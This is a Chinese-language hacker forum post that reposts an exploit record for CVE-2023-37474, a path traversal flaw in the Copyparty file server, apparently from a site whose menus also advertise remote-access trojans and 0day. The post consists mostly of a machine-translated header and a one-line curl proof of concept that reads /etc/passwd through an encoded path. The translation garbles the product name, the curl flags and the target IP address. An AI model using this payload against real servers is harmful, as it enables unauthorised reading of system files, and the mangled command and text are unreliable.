[ 主页 ]  [ 隐私策略 ]  [ 0day ]  [ 业务合作 ]  [ 获得金币 ]  [ 项目开发 ]  [ 渗透 ]  [ 逆向破解 ]  [ faq ]  [ 联系我们 ]  [ 远控木马 ]  [ 合作方式 ]    用户: 39601     
Telegram联系我们
H

版权党1.8.2-目录遍历

H

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#利用标题:版权1.8.2-目录遍历
#日期: 14/07/2023
#利用作者: vartamtzidis theodoros(@thehackydog)
#供应商homepage: https://github.com/9001/copyparty/
#软件link: https://github.com/9001/copyparty/releases/tag/v1.8.2
#版本:=1.8.2
#测试在: Debian Linux
#CVE : CVE-2023-37474
#描述
CopyParty是便携式文件服务器。 1.8.2之前的版本受到“ .cpr”子文件夹中检测到的路径遍历漏洞的约束。路径遍历攻击技术允许攻击者访问位于Web文档根目录之外的文件,目录和命令。
#poc
curl -i -s -k -x获取'http://127.0.0.0.1:3923/.cpr/%2FETC%2fpasswd'
 
H
mremoteng v1.77.3.1784 -nb-敏感信息在内存中存储敏感信息
H
Copyparty v1.8.6-反射的跨站点脚本(XSS)
点击展开...
好评 0 否决票
您必须登录或注册才可回复。
相似主题 热门帖子 查看更多

Partner Website 友情鏈接 : 臺灣駭客團隊論壇 全球最大的中文黑客论坛 한국 해커 팀 포럼 dark Web hacking team 骇客团队 HACKER.BZ UKhacker
暗网黑客论坛网站:声明,本网站的教程、文章、工具和其他相关内容仅供学习和研究使用,旨在提高公众的网络安全意识和防护能力。
我们强烈反对任何形式的非法活动,禁止未经授权的入侵、攻击、破坏他人的网络系统等行为。
Copyright © 2013-2025 HACK 您可以联系我们的Telegram进行业务合作: @HackAptTeam  网站地图Sitemap
后退
顶部